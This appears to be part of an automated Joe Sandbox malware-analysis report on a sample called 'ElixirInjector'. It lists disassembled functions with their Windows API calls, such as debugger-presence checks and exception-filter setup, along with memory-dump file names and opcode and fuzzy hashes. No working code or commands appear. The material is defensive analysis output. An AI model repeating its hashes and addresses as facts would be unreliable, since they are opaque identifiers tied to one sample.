Instruction Fuzzy Hash: B76228719002848FDB19DF78C8857EA3BA1FF54310F08457EEC9A8B282DB7599D5EB60

Function 00F2F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F2F844
IsDebuggerPresent.KERNEL32 ref: 00F2F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F2F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00F2F93A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8dbfc10ad7471964bbb3d6528872d8de3e10a9dc8ca3dc150bf60868ffd72cc9
Instruction ID: 3640f0f43d96a5349cc025245d951138a5c83c8277bb1bf360c488a4d291eb3b
Opcode Fuzzy Hash: 8dbfc10ad7471964bbb3d6528872d8de3e10a9dc8ca3dc150bf60868ffd72cc9
Instruction Fuzzy Hash: 84312975D1522D9BDB20DFA4DD897CCBBB8AF18704F1041AAE40CAB250EB759B889F44

Function 00F2E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00F2E5E8,0000001C,00F2E7DD,00000000,?,?,?,?,?,?,?,00F2E5E8,00000004,00F71CEC,00F2E86D), ref: 00F2E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00F2E5E8,00000004,00F71CEC,00F2E86D), ref: 00F2E6CF

Strings

D, xrefs: 00F2E6C3

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 45cdfcdcb91fd9f4e4c1ace096ad9b07a4a955f563dad51e836b448d1375bc86
Instruction ID: 2d8f43703d17559952da947a7762406ae556787eea07041981c3605845636831
Opcode Fuzzy Hash: 45cdfcdcb91fd9f4e4c1ace096ad9b07a4a955f563dad51e836b448d1375bc86
Instruction Fuzzy Hash: 93012B32E001196BDF14DE29DC09BDD7BAAEFC4334F1CC120ED19D7150D634D9059680

Function 00F38EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F38FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F38FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00F38FCC

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cba035ca208cfb31e970934f729e3cff3ac2078d47aec359375be1dd228f8aa6
Instruction ID: c925017df36d58ee443633e309bedb0894f143000eb19c9fe4920c8e2d7e91bd
Opcode Fuzzy Hash: cba035ca208cfb31e970934f729e3cff3ac2078d47aec359375be1dd228f8aa6
Instruction Fuzzy Hash: 4131C674D1122C9BCB21DF64DC88798BBB4AF58320F5042EAE81CA6250EB749F859F44

Function 00F3B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00F3B4DB

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: bbdea2a5b4ecd10e15185239cd03caae7c5172ccfcbcf30beb1528ba10ff36f7
Instruction ID: 968a460edc5a2cd8a21eb5d0d33860b3cf88633ecce7ff3431094addceb396e0
Opcode Fuzzy Hash: bbdea2a5b4ecd10e15185239cd03caae7c5172ccfcbcf30beb1528ba10ff36f7
Instruction Fuzzy Hash: 0B310471D00259AFCB24DE78CC94EFA7BBDDB85334F0441A8EA1897252E7349E45AB50

Function 00F3D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 50d018c2b6a2ecdfc5ce6d694077febd53d8a6589cf2b25a0c26e0c1ac414351
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: F5021C71E012199BDF14CFA9D8806ADF7F1EF88324F258269D919E7384D731AE41DB90

Function 00F2AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F2AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00F4E72C,?,?), ref: 00F2AF84

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 0bf5c5d3e8f9be1b2fde63123369b06c22012d0c1e713857ea90f82c5a394dc2
Instruction ID: 63f965cfc98ea0e350dcdffe558a65c7a878feb5408d313004f3d98567cf005d
Opcode Fuzzy Hash: 0bf5c5d3e8f9be1b2fde63123369b06c22012d0c1e713857ea90f82c5a394dc2
Instruction Fuzzy Hash: 7201713A50031CAAD7109F64EC45F9A7BBCFF5A710F405022FE1597151D374AA28DBA5

Function 00F16C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00F16DDF,00000000,00000400), ref: 00F16C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F16C95

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6432cfeba5fa67ebec42aa8cac154fd62157c1de80df96c1c0eb63f346d0dba2
Instruction ID: 512321c715ac34544da3f0a6e950040e5f88cf411c6b4defb54f7a8a786e3424
Opcode Fuzzy Hash: 6432cfeba5fa67ebec42aa8cac154fd62157c1de80df96c1c0eb63f346d0dba2
Instruction Fuzzy Hash: 71D0A935344300BFFA100B21AC06F6A7BA9BF52B56F18C004BB80E80E0DA708460B628

Function 00F419F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F419EF,?,?,00000008,?,?,00F4168F,00000000), ref: 00F41C21

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 697832b9522bf82707ef56ecdfea58d2adbc3ecb8a4853670b4a78c53a43bcf0
Instruction ID: d23001713b668c0ec8fb47e7934b38cda6839a9bb258b1861225bc72d8293098
Opcode Fuzzy Hash: 697832b9522bf82707ef56ecdfea58d2adbc3ecb8a4853670b4a78c53a43bcf0
Instruction Fuzzy Hash: 43B13932610608DFD719CF28C88ABA57FE0FF45364F258658E99ACF2A1C335E991DB40

Function 00F2F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F2F66A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 24f555ac0f3827f78113f2a7d5933758069101d8096b8e2f3a3dfea908c20d54
Instruction ID: 740e10fa478abb731cd2f976bb31b52c05cef3e8d1079f7d7b4ef2eff6ad2032
Opcode Fuzzy Hash: 24f555ac0f3827f78113f2a7d5933758069101d8096b8e2f3a3dfea908c20d54
Instruction Fuzzy Hash: 5C5180B1E106298FEB24CF58E9857AEBBF4FB48324F24853AD815EB250D3749948DF50

Function 00F1B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00F1B16B

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 0abb9f4b761da6bb145cde1886d362b7c091bfb6ec3ac3b5b1ca830bff3d3426
Instruction ID: cda5072fda927c2d91d4a6aec766e9753609298e4573ff53b8beef4a2e2ff3f3
Opcode Fuzzy Hash: 0abb9f4b761da6bb145cde1886d362b7c091bfb6ec3ac3b5b1ca830bff3d3426
Instruction Fuzzy Hash: 83F0F9B9D0024C9FDB18CB28EC916D577A1B759315F114695DA1593390C374A980EE60

Function 00F140FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 00F141BC

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 4c54c7db68b6de36c19e5e820a320b48b8471d6125eabd69db418cf8a963ee24
Instruction ID: 0db01dfd5ad519f3a930128e71b195c7027da74ceb6c6af73e9a70e5acd263d9
Opcode Fuzzy Hash: 4c54c7db68b6de36c19e5e820a320b48b8471d6125eabd69db418cf8a963ee24
Instruction Fuzzy Hash: 0FC13776A183818FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E945DB96

Function 00F2F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00F2F3A5), ref: 00F2F9DA

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4c6677d58303752e14ba7834f0cd535bb08d8f5655c3b795669e6e2e9e839a1c
Instruction ID: 4a8af90f2cccc81cddb43e9d12764b646ebde4e04edf4a75088fc6cbef3180e9
Opcode Fuzzy Hash: 4c6677d58303752e14ba7834f0cd535bb08d8f5655c3b795669e6e2e9e839a1c
Instruction Fuzzy Hash:

Function 00F3C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00F3C030

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 30754263754314e93bc0176c8025d637ec1b9c2f494ba6f8b1020d30793f1ac3
Instruction ID: af23666c5aa81cc42cc0e1dd819da8d57531afdbd3df526c8ea0fe863c478ef3
Opcode Fuzzy Hash: 30754263754314e93bc0176c8025d637ec1b9c2f494ba6f8b1020d30793f1ac3
Instruction Fuzzy Hash: A0A00174A022099B97848F35AE496493AA9AAA6695709406AA909C5164EA2485A0BA02

Function 00F262CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: fd0a1ad8f2d14e42be13de01a807d2b20c220cdbf23479d65a7dc0f8c6d8a2e9
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: 50620771A047948FCB25CF28D8906B9BBE1BF95304F08896DE8DACB346D734E945EB11

Function 00F277EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: d5c6bdd22dfa828e870feaf20317416cb31fd732b24b28a94cccbb29f11a2674
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: 77624871A0C3958FCB14DF28D890AB9BBE1BFD5300F18896DE89A8B346D730E945DB15

Function 00F1F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: 4bdb335506747f500eb1262912dfbc8024808dc73fce6bcf879b7b2fed528f60
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 5E525972A087018FC718CF19C891A6AF7E1FFCC314F498A2DE5959B255D334EA19CB86

Function 00F27153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c254dd730ac6665628ee6771f3feec1dcb4a953c293490cc0b9e2574d843c345
Instruction ID: a8b2cc7a0a16238edad646812e4b89253dcea7576dec8731b56d0acbae69aba5
Opcode Fuzzy Hash: c254dd730ac6665628ee6771f3feec1dcb4a953c293490cc0b9e2574d843c345
Instruction Fuzzy Hash: 0612D3B16087168FC718DF28D890AB9B7E0FF94314F14892EE996C7780E334E995EB45

Function 00F1C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7ae7e094b2a04217da95ec8c6e476de052adbac33e4fbe134785b40e19021c
Instruction ID: 27fddc44de0b33c7516bbd72e196a2731fd3424b41d518b9db541ff729131889
Opcode Fuzzy Hash: ab7ae7e094b2a04217da95ec8c6e476de052adbac33e4fbe134785b40e19021c
Instruction Fuzzy Hash: 56F1BE71A883418FC718CF29C4846AABBE1EFC9764F544A2EF4C9D7251D630D985EB82

Function 00F1E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d274ed080e561276b98e8a2d0c6823d7ab5003011b85b46366408c94ee0c5399
Instruction ID: 4e2f26373f2346ceb98f0f74eb6acbe5f24a9b37a9060b2df6d066df75224283
Opcode Fuzzy Hash: d274ed080e561276b98e8a2d0c6823d7ab5003011b85b46366408c94ee0c5399
Instruction Fuzzy Hash: 2AE15E755083948FC344CF19D89046ABFF0AF9A301F85095EFAD497392C235E919EBA2

Function 00F24088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

